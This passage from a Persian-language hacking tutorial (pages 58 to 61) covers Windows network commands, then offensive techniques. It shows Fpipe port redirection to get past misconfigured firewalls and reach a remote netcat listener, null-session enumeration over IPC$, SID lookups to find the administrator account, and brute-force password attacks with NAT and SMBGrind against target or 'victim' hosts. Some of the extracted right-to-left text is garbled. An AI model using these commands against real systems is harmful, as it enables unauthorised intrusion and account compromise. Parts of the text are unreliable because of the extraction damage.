ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ . : -ADDیﮏ ﻓﻘﺮﻩ ﺟﺪیﺪ در ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ. : -DELETEیﮏ ﻓﻘﺮﻩ از ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ را ﺡﺬف ﻣﻴﮑﻨﺪ. : -CHANGEﭘﺎراﻣﺘﺮهﺎی یﮑﯽ از ﻣﻘﺎدیﺮ ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ را ﺕﻐﻴﻴﺮ ﻣﻴﺪهﺪ. ﺱﺎیﺮ ﭘﺎراﻣﺘﺮهﺎی ﺧﻂ ﻓﺮﻣﺎن : : -fهﻤﻪ اﻏﻼم ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ را ﺡﺬف ﻣﻴﮑﻨﺪ. : -pاﮔﺮ هﻤﺮاﻩ ﺱﻮیﭻ addﺏﻪ ﮐﺎر رود یﮏ ﻓﻘﺮﻩ داﺋﻤﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ. : - destinationﺁدرس ﺷﺒﮑﻪ یﺎ ﻣﻴﺰﺏﺎن ﻓﻘﺮﻩ هﺎی از ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ ﮐﻪ اﺽﺎﻓﻪ یﺎ ﺡﺬف ﻣﻴﺸﻮد و یﺎ ﺕﻐﻴﻴﺮ دادﻩ ﻣﻴﺸﻮد را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ. : - MASK netmaskﻣﺎﺱﮏ زیﺮ ﺷﺒﮑﻪ ﻣﺘﻨﺎﻇﺮ ﺏﺎ ﺁدرس ﻣﺸﺨﺺ ﺷﺪﻩ ﺕﻮﺱﻂ ﻣﺘﻐﻴﺮ destinationرا ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. : - gatewayﺁدرس ﻣﺴﻴﺮ یﺎﺏﯽ ﮐ ﻪ ﺏ ﺮای دﺱ ﺘﻴﺎﺏﯽ ﺏ ﻪ ﺁدرس ﻣﻴﺰﺏ ﺎن ی ﺎ ﺷ ﺒﮑﻪ ﻣ ﺸﺨﺺ ﺷ ﺪﻩ ﺕﻮﺱ ﻂ ﻣﺘﻐﻴ ﺮ destinationﺏ ﻪ ﮐ ﺎر رﻓﺘ ﻪ اﺱ ﺖ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. ﻓﺮﻣﺎن : Netstat
٥٨
ﺻﻔﺤﻪ
!! آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم : ﺧﻮب ایﻦ ﻓﺮﻣﺎن ﺷﮑﻞ ﻋﻤﻮﻣﯽ ﺁن ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ ( ﻧﺸﺎن ﻣﻲconnections) ( ﺏﻪ ﺱﺮ ﻣﻴﺒﺮﻧﺪ ﺏﻪ هﻤﺮاﻩ ﺏﻘﻴﻪ اﺕﺼﺎﻻتlistening) ﺕﻤﺎﻣﻲ ﭘﻮرت هﺎیﻲ ﮐﻪ در وﺽﻌﻴﺖ ﺷﻨﻮد .دهﺪ .( را ﻧﺸﺎن ﻣﻲ دهﺪEthernet) ﺁﻣﺎر اﺕﺮﻧﺖ .ﺁدرس هﺎ و اﻋﺪاد ﭘﻮرت هﺎ را ﺏﻪ ﻓﺮم ﻋﺪدي ﻧﺸﺎن ﻣﻲ دهﺪ . ﻣﺸﺨﺺ ﺷﺪﻩ را ﻧﺸﺎن ﻣﻲ دهﺪproto ( ﻣﺮﺏﻮط ﺏﻪ ﭘﺮوﺕﮑﻠﻲ ﮐﻪ ﺕﻮﺱﻂconnections) ﺕﻤﺎﻣﻲ اﺕﺼﺎﻟﺖ .( را ﻧﺸﺎن ﻣﻲ دهﺪrouting table) ﺕﻤﺎﻣﻲ ﻣﺤﺘﻮیﺎت ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﻲ . ﻧﺸﺎن دادﻩ ﻣﻲ ﺷﻮدIP وUDP، TCP در ﺡﺎﻟﺖ ﭘﻴﺶ ﮔﺰیﺪﻩ ﺁﻣﺎر ﭘﺮوﺕﮑﻞ هﺎي.ﺁﻣﺎر هﺮ ﭘﺮوﺕﮑﻞ را ﻧﺸﺎن ﻣﻲ دهﺪ .ﺁﻣﺎر اﻧﺘﺨﺎﺏﻲ را ﻣﺠﺪدا ﺏﻪ ﻧﻤﺎیﺶ در ﻣﻲ ﺁورد
ﺱﻮیﭻ -a
١
-e -n -s -p proto -r interval
٢ ٣ ۴ ۵ ۶ ٧
: Ipconfig دﺱﺘﻮر !! ﺕﺎﺏﻠﻮ. ﺧﻮب ﺏﻪ ﺏﻴﻨﻴﺪ ﭼﻪ ﻣﻴﺸﻮد،،، ﺏﻪ ﮐﺎر ﺏﺒﺮیﺪ/all ﺧﻮب اﮔﺮ دﺱﺘﻮر را ﺏﺎ ﭘﺎراﻣﺘﺮ DHCP ﺏﻪ ﮐﺎر ﺏﺒﺮیﺪ ﺏﺮای ﺕﻘﺎﺽﺎی ﺧﺎﺕﻤﻪ دادن یﺎ ﺕﻤﺪیﺪ اﺟﺎرﻩ یﮏ ای ﺴﺘﮕﺎﻩ ﮐ ﺎری از ﺱ ﺮویﺲ/renew و/release اﮔﺮ دﺱﺘﻮر را ﺏﺎ ﭘﺎراﻣﺘﺮ .هﻢ ﻣﻴﺘﻮان اﺱﺘﻔﺎدﻩ ﮐﺮد .– ﺏﻪ ﮐﺎر ﺏﺒﺮیﺪ ﻟﻴﺴﺖ ﭘﺎراﻣﺘﺮ هﺎ را ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪH اﮔﺮ دﺱﺘﻮر را ﺏﺎ ﭘﺎراﻣﺘﺮ : Nbtstat ﻓﺮﻣﺎن هﻨﮕﺎم ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ هﺎی ﺕﻌﻴﻴﻦ داﻣﻨﻪ و یﺎ ﺱﺮویﺲ دهﻨﺪﻩ هﺪف ﻗﺎدر ﺏﻪ ﺏﮑﺎرﮔﻴﺮی ایﻦ ﻓﺮﻣﺎن ﺧﻮاهﻴﻢ ﺏﻮد ﺕﺎ ﺟﺪول اﺱﺎﻣﯽ را از ﺱﺮویﺲ دهﻨﺪﻩ . و ﮐﻼ ﺟﻬﺖ ﺕﺸﺨﻴﺺ اﻃﻼﻋﺎت ﻣﻔﻴﺪ در ﺏﺎرﻩ ﺱﺮویﺲ دهﻨﺪﻩ هﺪف اﺱﺖ.هﺪف ﺏﺪﺱﺖ ﺁوریﻢ C:\>nbtstat Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP). NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ] -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.
: Getmac اﺑﺰار
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٩
ﺟﻬﺖ ﮐﺴﺐ اﻃﻼﻋﺎت اﻧﺘﻘﺎﻟﯽ ﺷﺒﮑﻪ از ﺱﺮویﺲ دهﻨﺪﻩ هﺪف ﻣﻴﺘﻮان از ﻓﺮﻣﺎن ﻣﺰﺏﻮر اﺱﺘﻔﺎدﻩ ﮐﺮد .ایﻦ اﺏ ﺰار ﻧ ﺸﺎﻧﯽ MACﺱ ﺮویﺲ دهﻨ ﺪﻩ ه ﺪف و ...را ﺏﻪ ﻣﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و اﻟﺒﺘﻪ ﺏﻪ اﺕﺼﺎل Null Sessionاﺡﺘﻴﺎج دارد. دﺱﺘﻮر : ARP ایﻦ ﻓﺮﻣﺎن راﺏﻄﻪ ﺏﻴﻦ ﺁدرس ﻓﻴﺰیﮑﯽ ) ( MACﻣﺎﺷﻴﻦ هﺎی ﻣﺴﺘﻘﺮ در یﮏ ﺷﺒﮑﻪ ایﻨﺘﺮﻧﺖ را ﺏﺎ ﺁدرس IPان ﻣﺎﺷﻴﻦ در زیﺮ ﺷﺒﮑﻪ ) SUB ( NETﺁﺷﮑﺎر ﻣﻴﮑﻨﺪ. هﺮ ﮐﺎرﺏﺮی از ﺷﺒﮑﻪ ﻗﺎدر اﺱﺖ راﺏﻄﻪ ﻣﺰﺏﻮر یﺎ ﺁدرس IPﺧﻮد را دﺱﺘﺨﻮش ﺕﻐﻴﻴﺮ ﮐﻨﺪ و هﻮیﺖ دیﮕﺮان را ﺟﻌﻞ ﮐﻨﺪ !! ایﻦ دﺱﺘﻮر ﺏﺎﻻ ﺏﺮای ﺕﺸﺨﻴﺺ ایﻦ ﮐﺎر اﺱﺖ. ﺿﻤﻴﻤﻪ ﺵﻤﺎرﻩ دو ؛ ﺁﻣﻮزش ﺏﺮﻧﺎﻣﻪ هﺎی ﺕﻐﻴﻴﺮ ﻣﺴﻴﺮ ﭘﻮرت : ایﻦ ﮐﺎر در ﻣﻮاﻗﻌﯽ ﮐﻪ اﻟﺒﺘﻪ ﻧﺎدر هﻢ ﻧﻴﺴﺖ ﺏﺴﻴﺎر اﻧﺠﺎم ﻣﻴﺸﻮد .ﺏﺮای ایﻦ ﻣﻨﻈﻮر از دو ﺏﺮﻧﺎﻣﻪ Datapipeو Fpipeاﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ﮐﻪ اوﻟﯽ ﭘﺪر دوﻣﯽ اﺱﺖ و ﻣﺜﻞ روال هﻤﻴﺸﮕﯽ اول ﺏﺮی ﺧﺎﻧﻮادﻩ ﻟﻴﻨﻮﮐﺲ ﺱﺎﺧﺘﻪ ﺷﺪ .اﺏﺰار دوﻣﯽ ﺏﺮای ویﻨﺪوز اﺱﺖ و ﺏﺪون هﻴﭽﮕﻮﻧﻪ اﻏﺮاق ﺕﻤﺎم ﺡﺮﻓﻪ ایﯽ هﺎ ﻗﺒﻮل دارﻧﺪ ﮐﻪ ﺏﺮ ﺧﻼف ﺱﻨﺖ ایﻦ دﻓﻌﻪ اﺏﺰار ویﻨﺪوز ﻗﻮی ﺕﺮ اﺱﺖ. ایﻦ ﻻزم ﺏﮕﻢ ﮐﻪ ایﻦ اﺏﺰار) (Datapipeﺏﺎ ایﻦ ﮐﺎرایﯽ ﺧﻔﻦ ﻓﻘﻂ ﺏﺎ ١٠٠ﺧﻂ ﺏﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ اﺱﺖ ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺲ هﺎ ﻣﻴﺪاﻧﻨﺪ ﻣﻦ ﭼﯽ ﻣﻴﮕﻢ !! اﺑﺰار : Fpipe ایﻦ ﮐﺎر ﺏﺮای ﺕﻐﻴﻴﺮ ﻣﺴﻴﺮ ﻣﺎﺷﻴﻦ Clientﺡﻴﻦ ﻓﺮﺁیﻨﺪ در ﺧﻮاﺱﺖ ﺱﺮویﺲ وب و ..اﻧﺠﺎم ﻣﻴﺪهﻴﻢ !! ﺏﻌﺪ از اﺟﺮای ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺎ ﺱﻮیﭻ ) –hهﻤﺎن ﺱﻮیﭻ Helpاﺱﺖ ( ﺷﮑﻞ زیﺮ را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ: C :\> fpipe.exe –h -? / -h -show this help test. -c - maximum allowed simultaneous TCP connection. Defaults is 32 -i - listening interface IP Address. -l - remote port number -s - outbound source port number. -u - UDP mode. -v - Verbose mode. ﺧﻮب ﮔﺰیﻨﻪ هﺎی ﺕﺎﺏﻠﻮی دارد ﻣﺜﻼ ﻣﺜﻞ ﺏﻘﻴﻪ ﺏﺮﻧﺎﻣﻪ هﺎ ﺱﻮیﭻ –vﺟﺰﺋﻴﺎت ﭘﻴﺸﺮﻓﺖ ﮐﺎر را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ؛ ﺱﻮیﭻ –uﺏﺮای ﭘﻮرت هﺎی UDP اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ....ﮐﻪ اﻟﺒﺘﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ اﺱﺎﺱﯽ ﻧﮕﺮان ﻧﺒﺎﺷﻴﺪ ﭼﻮن ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺕﺎ ﺏﻪ ﺡﺎل ﺏﺎ ایﻦ ﺁﺷﻨﺎیﯽ ﻧﺪاﺷﺘﻪ ﺏﺎﺷﻴﺪ. ﺏﺎ ﻣﺜﺎل ﺟﻠﻮ ﻣﻴﺮوم ﮐﻪ ﮐﺎرای هﻢ داﺷﺘﻪ ﺏﺎﺷﺪ !! ﺧﻮب ﻣﺜﻼ ﻣﺎ ﻣﻴﺨﻮاهﻴﻢ ﺕﺮاﻓﻴﮏ وب را از روی ﭘﻮرت ٨٠ﮐﻪ اﻟﺒﺘﻪ اﺱﺘﺎﻧﺪارد ایﻦ ﮐﺎر هﻢ هﺴﺖ ﺏﻪ ﭘﻮرت ٩٠٨٠ﻣﻨﺘﻘﻞ ﮐﻨﻴﻢ ﺕﺎ ﺡﺎل ﮐﻨﻴﻢ !! ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﻣﻴﻨﻮیﺴﻴﻢ : C :\> fpipe –l 9080 –r 80 www.google.com Pipe connected: In : 127.0.0.1 : 1917 Æ 127.0.0.1 : 9080 Out : 192.168.0.148 :1972 Æ 216.239.33.101 : 80 ایﻦ ﺏﺮﻧﺎﻣﻪ ﮔﺰارش اﺕﺼﺎل هﺎی ﻣﻮﺟﺪ را هﻨﮕﺎﻣﯽ ﮐﻪ ﮐﻠﻴﺪ Ctrl+Cرا ﺏﺮای ﺁن ﻓﺸﺎر ﻧﺪهﻴﺪ ﺏﺮای ﺷﻤﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ .ﺧﻮب ﺕﻮﺟﻪ ﮐﻨﻴﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻋﻼوﻩ ﺏﺮ ﺁدرس IPﻣﺒﺪا و ﻣﻘﺼﺪ و هﻤﭽﻨﻴﻦ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﻨﺒﻊ هﺮ اﺕﺼﺎل را ﻧﻴﺰ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ. ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺱﻮیﭻ –sﻣﯽ ﺕﻮان اﻣﮑﺎن ﺏﻬﺮﻩ ﺏﺮداری ﺏﻴﺸﺘﺮ از ﻣﺸﺨﺼﻪ ﭘﻮرت را در اﺧﺘﻴﺎر ﺏﺮﻧﺎﻣﻪ ﻗﺮار داد .ﺏﻪ ﻣﺜﺎل زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ. C: \> fpipe –l 139 –r 139 s 88 192.168.97.154 ﺷﺎیﺪ ﺏﺎ ﻧﮕﺎﻩ اول ﺏﻪ ایﻦ ﻣﺜﺎل ﻓﮑﺮ ﮐﻨﻴﺪ ﮐﻪ ﻣﻦ دیﻮاﻧﻪ ام ﮐﻪ ﺕﺮاﻓﻴﮏ NetBIOSرا دوﺏﺎرﻩ ﺏﻪ ﺧﻮدش ﺏﺮﮔﺮداﻧﺪم ﻣﺰیﺖ ایﻦ ﮐﺎر در ایﻦ ﻧﻬﻔﺘﻪ اﺱﺖ ﮐﻪ هﻤﻪ ﺕﺮاﻓﻴﮏ SMBدر ﻓﺮﺁیﻨﺪ ﺕﻐﻴﻴﺮ ﻣﺴﻴﺮ ﻓﻮق از یﮏ ﭘﻮرت ﻣﻨﺒﻊ واﺡﺪ ) ﭘﻮرت ﺷﻤﺎرﻩ (٨٨ﺟﺎری ﻣﻴﺸﻮد .از ایﻦ ﮐﺎر ﻣﻴﺸﻮد ﺟﻬﺖ ﺧﻨﺜﯽ ﺱﺎزی ﺕﺎﺙﻴﺮ دیﻮارهﺎی ﺁﺕﺸﯽ اﺱﺘﻔﺎدﻩ ﮐﺮد ﮐﻪ ﺏﮕﻮﻧﻪ ﻧﺎ ﻣﻨﺎﺱﺐ ﭘﻴﮑﺮ ﺏﻨﺪی ﺷﺪﻩ اﻧﺪ .ﭘﻮرت هﺎی ﻗﺎﺏﻞ ﺕﻮﺟﻪ دیﮕﺮ ﺏﺮای ایﻦ ﻓﺮایﻨﺪ ﻋﺒﺎرﺕﻨﺪ از ٢٠و ٢۵و ۵٣و . ٨٠ یﮏ ﻣﺜﺎل دیﮕﺮ ﻣﻴﺰﻧﻢ ﺏﻬﺘﺮ یﺎد ﺏﮕﻴﺮیﺪ !! ﺏﻪ ﻋﻨﻮان ﻣﺜﺎل اﮔﺮ ﻣﻴﺰﺏﺎن Remoteدارای NCدر ﭘﻮرت ١٠٠٠ﺏﺎﺷﺪ ،از Fpipeﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﺁن وﺱﻴﻠﻪ ﭘﻮرت ﻣﺒﺪا ﻣﺘﻔﺎوت اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ و در رایﺎﻧﻪ ﺧﻮدﻣﺎن دﺱﺘﻮر زیﺮ را وارد ﻣﻴﮑﻨﻴﻢ :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٠
C :\> Fpipe.exe –l 23 –s 25 –r 1000 xxx.xxx.xxx.xxx ایﻦ دﺱﺘﻮر Fpipeرا ﺏﺮای ارﺕﺒﺎﻃﯽ در ﭘﻮرت ٢٣ایﺠﺎد ﻣﻴﮑﻨﺪ .ﺏﻮﺱﻴﻠﻪ Telnetﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﭘﻮرت ٢٣ﺏﺮای دﺱﺘﮕﺎﻩ ﺁزﻣﺎیﺶ ، ﺕﺮاﻓﻴﮏ ﺏﺮای ﭘﻮرت ١٠٠٠در ﻣﻴﺰﺏﺎن Remoteﺏﺎ xxx.xxx.xxx.xxx IPﺕﻌﻴﻴﻦ ﺧﻮاهﺪ ﺷﺪ ﮐﻪ از ﭘﻮرت ﻣﺒﺪا ٢۵اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ .اﮐﻨﻮن ﻗﺎدر ﺏﻪ اﺱﺘﻔﺎدﻩ از NCاز راﻩ دور هﺴﺘﻴﻢ !! ﺿﻤﻴﻤﻪ ﺵﻤﺎرﻩ ﺱﻪ ؛ اﺏﺰارهﺎی ﻣﻔﻴﺪ ﺏﺮای ویﻨﺪوز : ﻣﻘﺪﻣﻪ : ایﻦ اﺏﺰارهﺎیﯽ ﮐﻪ ایﻦ ﺟﺎ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰارهﺎیﯽ ﺧﻮب هﺴﺘﻨﺪ ﮐﻪ ﮐﺎرایﯽ ﻋﺎﻟﯽ دارﻧﺪ اﻟﺒﺘﻪ اﮐﺜﺮا ﺏﺮای یﮏ ﮐﺎر ﺧﺎص هﺴﺘﻨﺪ و اﻟﺒﺘﻪ داﺧﻞ ویﻨﺪوز ﻧﻴﺴﺘﻨﺪ !! : Null Connection -١ ﺧﻮب ایﻦ یﮏ اﺏﺰار ﻧﻴﺴﺖ ﺏﻠﮑﻪ ﺏﻪ ﻧﻮع ﺧﺎﺻﯽ ارﺕﺒﺎط ﺏﻴﻦ دو ﮐﺎﻣﭙﻴﻮﺕﺮ ﻣﻴﮕﻮیﻨﺪ ﮐﻪ ﻣﻬﻤﺎن ﮐﻪ درﺧﻮاﺱﺖ ارﺕﺒﺎط را ﻓﺮﺱﺘﺎدﻩ اﺱﺖ ﺕﺎ ﭘﺎیﺎن ﻧﺸﺴﺖ ﻧﺎﺷﻨﺎس ﺏﺎﻗﯽ ﺏﻤﺎﻧﺪ . ایﻦ ﻧﻮع ارﺕﺒﺎط ﻣﻌﻤﻮﻻ ﺏﺪون ﻧﺎم ﮐﺎرﺏﺮ و ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﺮﻗﺮار ﻣﻴﺸﻮد ،از دﺱﺘﻮر NET USEﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ اﺷﺘﺮاک ﭘﻴﺶ ﻓﺮض IPC$در ﺱﻴﺴﺘﻢ ویﻨﺪوز NTاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ .ﺏﺎ اﺕﺼﺎل ایﻦ ﻧﻮع ﻣﻴﺘﻮان اﻃﻼﻋﺎﺕﯽ درﺏﺎرﻩ ﮐﺎرﺏﺮ ،ﮔﺮوﻩ ،و ...ﺏﻪ دﺱﺖ ﺁورد .ایﻦ اﺕﺼﺎل ﻧﻴﺎز ﺏﻪ ﺏﺎز ﺏﻮدن ﭘﻮرت ١٣٩دارد . ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ : C :\> net use \\ server name \ipc$ (( )) User (( ))/ -٢اﺑﺰار : Dump SEC ایﻦ اﺏﺰار دریﺎﻓﺖ اﻃﻼﻋﺎت ﻓﻮق اﻟﻌﺎدﻩ در ﺏﺎرﻩ ﺱﺮویﺲ دهﻨﺪﻩ هﺎ و ﮐﺎرﺏﺮان ﺁﻧﻬﺎ اﺱﺖ .اﺡﺘﻴﺎج ﺏﻪ ﻧﺸﺴﺖ Nullدارد .ﻣﻴﺘﻮان ﺁن را روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ ﻓﺮﺱﺘﺎد و ﺏﻌﺪ در ﺁﻧﺠﺎ اﺟﺮا ﮐﺮد و ﺟﻮاب هﺎ را ﻣﺸﺎهﺪﻩ ﮐﺮد . در ﻣﺠﻤﻮع ﮐﺎرایﯽ ﺁن ﻋﺎﻟﯽ اﺱﺖ و اﮔﺮ ﺏﻪ ﺧﻂ ﻓﺮﻣﺎن ﻗﺮﺏﺎﻧﯽ دﺱﺖ رﺱﯽ داریﺪ ﺡﺘﻤﺎ ایﻦ را اﻣﺘﺤﺎن ﮐﻨﻴﺪ . -٣اﺑﺰار SID 2 Userو : User 2 SID یﮏ ﻧﻤﻮﻧﻪ ایﻦ را ﺏﺎﻻ ﺕﺮ هﺎ ﻣﻌﺮﻓﯽ ﮐﺮدم .در ﻣﻮاﻗﻌﯽ ﮐﻪ Restrict Anonymousدر Registryﺏﺮاﺏﺮ ﺏﺎ ١ﺕﻨﻈﻴﻢ ﺷﺪﻩ ﺏﺎﺷﺪ ﺧﻴﻠﯽ از اﺏﺰارهﺎی ﺏﺎﻻ ﺟﻮاب ﺏﺮای ﻣﺎ ﺏﺮﻧﻤﯽ ﮔﺮداﻧﺪ در ایﻦ واﻗﻊ ﻣﺎ از ایﻦ دو اﺏﺰار ﺏﺮای ﻓﻬﻤﻴﺪن SIDﻣﺪیﺮ ﮐﻪ ﺏﺮاﺏﺮ ﺏﺎ ۵٠٠ﻧﻴﺰ هﺴﺖ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ. ایﻦ اﺏﺰار هﻢ ﻧﻴﺎز ﺏﻪ یﮏ ﻧﺸﺴﺖ Nullدارد .ﺏﻪ ﻣﻨﻈﻮر ﺏﻪ ﮐﺎرﮔﻴﺮی User 2 SIDﻧﺨﺴﺖ ﺏﺎیﺪ Nullﺏﺮای ﺱﺮویﺲ دهﻨﺪﻩ ایﺠﺎد ﮐﺮد و ﺱﭙﺲ User 2 SIDرا ﺏﺮ ﺧﻼف ﺱﺮویﺲ دهﻨﺪﻩ هﺪف و یﮏ ﮔﺮوﻩ ﺷﻨﺎﺧﺘﻪ ﺡﺴﺎب را ﺏﺮای ﺕﻌﻴﻴﻦ ﺷﻨﺎﺱﻪ SIDراهﺎﻧﺪازی ﮐﺮد.ﺕﺮﺕﻴﺐ ﭘﺎیﻴﻦ SID دﺱﺘﮕﺎﻩ هﺪف را ﺏﺎز ﻣﻴﮕﺮداﻧﺪ : “ C :\> user 2 sid \\ server-name “ domain user ﺱﭙﺲ ایﻦ وﺱﻴﻠﻪ SIDرا ﺏﺮای ﺱﺮویﺲ دهﻨﺪﻩ ﺏﺎز ﻣﻴﮕﺮداﻧﺪ .اﮐﻨﻮن ﮐﻪ SIDدﺱﺘﮕﺎﻩ و ﺷﻨﺎﺱﻪ ﻧﺴﺒﯽ ) (REDﮔﺮوﻩ ﻣﺪیﺮیﺖ را در اﺧﺘﻴﺎر داریﺪ ، ﻗﺎدر ﺏﻪ راﻩ اﻧﺪازی SID 2 Userﺟﻬﺖ ﺕﻌﻴﻴﻦ IDSﮐﺎرﺏﺮ ﺧﻮاهﻴﺪ ﺏﻮد ﮐﻪ از ﻣﺪیﺮان ﺏﻪ ﺡﺴﺎب ﻣﯽ ﺁیﻨﺪ .ﺕﺮﺕﻴﺐ ایﻦ دﺱﺘﻮر ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ: C :\> SID 2 User \\ server-name \ machine-sid admin-RID -۴اﺑﺰار NATو ﻳﺎ ﺑﺎ ﻧﺎم ﮐﻤﺎل : Net BIOS Auditing Tool ایﻦ اﺏﺰار ﺏﺮای ﺕﺴﺖ ﮐﻠﻤﺎت ﻋﺒﻮر ﺏﺮ روی یﮏ ﮐﺎرﺏﺮ و یﺎ ﻓﻬﺮﺱﺘﯽ از ﮐﺎرﺏﺮان ﺏﺎ ﻣﮑﺎﻧﻴﺰم Brute Forceاﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﮐﻠﯽ رد ﭘﺎ از ﺧﻮدش ﺏﻪ ﺟﺎ ﻣﻴﮕﺰارد و ﮐﻨﺪ ﻧﻴﺰ هﻢ اﺱﺖ وﻟﯽ ﮐﺎرای ﺁن ﺧﻮب اﺱﺖ !! ایﻦ اﺏﺰار ﺁﻧﻘﺪر ﮐﺎر ﻣﻴﮑﻨﺪ ﺕﺎ یﮏ ﻧﺎم ﮐﺎرﺏﺮ و ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﻪ درد ﺏﺨﻮر ) ﻣﻌﺘﺒﺮ( ﭘﻴﺪا ﮐﻨﺪ ﺏﻌﺪ ﻣﺘﻮﻗﻒ ﻣﻴﺸﻮد !!ﺷﮑﻞ ﮐﺎر ﺏﺎ ایﻦ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ : C :\> nat –O out put.txt –u user list.txt –p passlist.txt xxx.xxx.xxx.xxx -۵اﺑﺰار : SMB Grind
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦١
ایﻦ اﺏﺰار هﻢ دﻗﻴﻘﺎ ﻣﺜﻞ ﺏﺎﻻی اﺱﺖ و از هﻤﺎن ﻣﮑﺎﻧﻴﺰم اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ وﻟﯽ ﻓﺮق ایﻦ ﺏﺎ ﺏﺎﻻیﯽ ایﻦ اﺱﺖ ﮐﻪ ﺧﻴﻠﯽ ﺱﺮیﻊ ﺕﺮ اﺱﺖ ﮐﺎر ﺏﺎ ایﻦ هﻢ ﺱﺎدﻩ اﺱﺖ ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر در ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ : C :\> smbgrind –i IP address –r Net BOIS -v دارای یﮏ ﺕﻌﺪادی ﺱﻮیﭻ هﺴﺖ ﮐﻪ ﺏﻪ ﺧﻮدﺕﺎن ﺕﻮﺽﻴﺤﺎت ﺁن را واﮔﺬار ﻣﻴﮑﻨﻢ . -۶اﺑﺰار : Somarsoft DumpReg ایﻦ اﺏﺰار اﻣﮑﺎن ﺕﻘﺎﺽﺎی اﻃﻼﻋﺎت registryرا از ﺱﺮویﺲ دهﻨﺪﻩ راﻩ دور ﻓﺮاهﻢ ﻣﻴﮑﻨﺪ .ایﻦ اﺏﺰار اﺡﺘﻴﺎج ﺏﻪ اﺕﺼﺎل NULLدارد ﮐﻪ ﺏﺎیﺪ ﺏﺎ دﺱﺘﻮر NET USEایﺠﺎد ﮐﻨﻴﺪ .ایﻦ را ﺏﮕﻮیﻢ هﻢ ﮐﻪ ایﻦ اﺏﺰار ﮔﺮاﻓﻴﮑﯽ اﺱﺖ .
